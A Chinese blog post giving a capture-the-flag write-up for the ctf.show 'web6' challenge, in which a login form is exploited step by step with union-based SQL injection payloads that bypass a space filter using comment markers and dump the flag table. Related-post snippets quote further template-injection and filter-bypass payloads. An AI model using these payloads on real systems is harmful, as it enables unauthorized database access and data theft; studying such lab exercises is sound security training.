CTF.show:web6

最新推荐文章于 2024-06-24 17:14:21 发布
最新推荐文章于 2024-06-24 17:14:21 发布
阅读量434 收藏
点赞数
分类专栏: CTF.show CTF_Web_Writeup 文章标签: SQL注入 安全测试 数据库漏洞 联合查询 信息泄露
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/112664567
版权

登陆窗,先想到sql注入
在这里插入图片描述
抓包测试发现失败
在这里插入图片描述

在这里插入图片描述
利用/**/代替空格进行绕过

username=admin'/**/or/**/1=1#&password=123456

在这里插入图片描述
利用联合查询找到回显位置

username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456

在这里插入图片描述
查数据库名

username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123456

在这里插入图片描述
查询数据库内数据表名称

username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123456

在这里插入图片描述
发现了flag的表,查看该表字段名

username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123456

在这里插入图片描述
查询字段信息

username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=123456

在这里插入图片描述
得到flag

FW_ENJOEY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.show_web2解题过程
qq_38634097的博客
05-24 475
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
CTF.show:web13
qq_46230755的博客
01-15 1873
扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.
ctfshow-萌新-web6( 利用二进制绕过获取网站敏感信息)_ctfshow萌新web6
最新发布
2401_84301352的博客
06-24 400
萌新模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键字,推荐使用二进制绕过页面中展示了部分源码,并提示我们 id=1000 时,就是flag这里先上答案,payload如下接下来详细解释一下解题的思路,首先是利用intval()函数转换字符串的特性进行绕过。
CTF.show:web10
qq_46230755的博客
01-15 700
web9一样。先查看一下源码, 右键查看源代码 进入style.css 发现有index.phps 在url处输入后,查看源码得到 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"
ctf.show_web2
小支柱的博客
05-11 422
ctfshow靶场ctf.show_web2解题思路
CTF.show:web12
qq_46230755的博客
01-15 376
右键查看源代码 有提示,试一下cmd=phpinfo(); 出现回显,采用glob通配符命令得到文件名 php的函数glob(); glob() 函数返回匹配指定模式的文件名或目录。 举个例子: glob("") 匹配任意文件 glob(".txt")匹配以txt为后缀的文件 有了这个方法我们先把当前目录下所有的文件找出来看看有没有可用的。 输入?cmd=print_r(glob("*"));打印出了如下文件 尝试进入那个很长的php文件 利用highlight_file函数 /?cmd=high
CTF.show:web14
qq_46230755的博客
01-16 351
打开来后执行语句得到提示 ?c=3 当c为3时,不会退出循环,进而执行下一个case语句得到url here_1s_your_f1ag.php 进入之后发现是一道注入题目 查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){ die('@A@'); 老样子先爆库名 /here_1s_your_f1ag.
ctf.show_web4
Kobalos的博客
12-15 2707
查看题目 发现题目要求get请求传输一个url参数,并且看到了include,估计需要使用伪协议进行包含,进行尝试 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input 发现报错error,继续尝试其他协议发现都显示error 尝试直接在后面加文件 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=/etc/pa
ctf.show web web1-web10
qq_61993117的博客
09-17 1823
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
CTF.show:萌新:web13
qq_46230755的博客
02-04 603
<?php # flag in config.php include("config.php"); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c)){ eval($c); }else{ die("cmd error");
Bugku:Simple_SSTI_2
热门推荐
qq_46230755的博客
03-10 1万+
我超喜欢这种题目的,确实对我这种萌新非常的友好 打开后,题目提示存在模板注入 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po
Bugku:Simple_SSTI_1
qq_46230755的博客
03-01 8364
很简单的模板注入,直接F12查看提示 flag在secret_key下。 bugku才是对萌新最友好的平台!!!!
CTF.show:WEBweb签到题-web4
qq_46230755的博客
01-12 2587
ctf.show做题记录web签到题web2web3 web签到题 查看源码得到flag web2 手抖点到hint索性直接全抄 1.查当前数据库名称 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 得到数据库名称web2 2.查看数据库表的数量 ' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'
CTF.show:红包题第二弹
qq_46230755的博客
01-15 1444
学习一下知识点: 先马住p神的两篇文章 一些不包含数字和字母的 webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 无字母数字 webshell 之提高篇 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 这一段Y1ng师傅说的很详细了 https://www.gem-love.com/web
第五届蓝帽杯半决赛部分WP
qq_46230755的博客
06-06 1316
文章目录RE:ser_leakWEB:杰克与肉丝PWN:cover RE:ser_leak 题目是原题: x1-x5: def func2(x): if x == 0: return 0 return (x % 2) + func2(x // 2) def func3(x): return x % 2 def func1(N, L, R): if L == R: return L mid = (L + R + 1) // 2 if N < mid * mid: retur
攻防世界:Web_php_unserialize
qq_46230755的博客
01-05 1286
'/[oc]:\d+:/i'含义是:匹配o或c任意一个,冒号,至少一个数字,冒号,不区分大小写 [ ] 是定义匹配的字符范围 [oc]是匹配o或c任意一个 [xyz] 字符集合。匹配所包含的任意一个字符。例如, ‘[abc]’ 可以匹配 “plain” 中的 ‘a’。
BUUCTF:[BJDCTF 2nd]假猪套天下第一
qq_46230755的博客
12-17 1233
先测试一下admin用户,发现会回弹 在测试一下其他账户,发现会进入 (下面那个root点进去是y1ng师傅的网站) 我们试着抓个包,发现存在着一个提示 打开这个L0g1n.php发现里面是 提示99年才能访问,我们回到Burpsuite,看访问L0g1n.php抓的包。发现有个time参数,把他改成非常大 提示发生变化,告诉我们只有主机可以访问进去,考虑用X-Forwarded-For和Client-ip进行绕过 提示显示X-Forwarded-For被过滤了,那么使用Client-ip C.
BUUCTF:[CISCN 2019 初赛]Love Math
qq_46230755的博客
12-27 920
base_convert(37907361743,10,36)得到“hex2bin” dechex(1598506324)得到“5f474554” $pi=hex2bin(5f474554)得到$pi="_GET" ($$pi){pi}(($$pi){abs})=$_GET{pi}($_GET{abs})
ctf.show_web6
10-21
ctf.show_web6是一个WEB模块,其中存在一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格。我们可以使用括号()或者注释/**/绕过。如果成功注入,可以获取到flag。同时,在密码框中输入空格也会多一个黑点,说明空格被过滤了。为了验证这个猜想,可以抓包查看服务器收到的页面请求包最后传递的用户名和密码的参数值是什么样子的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值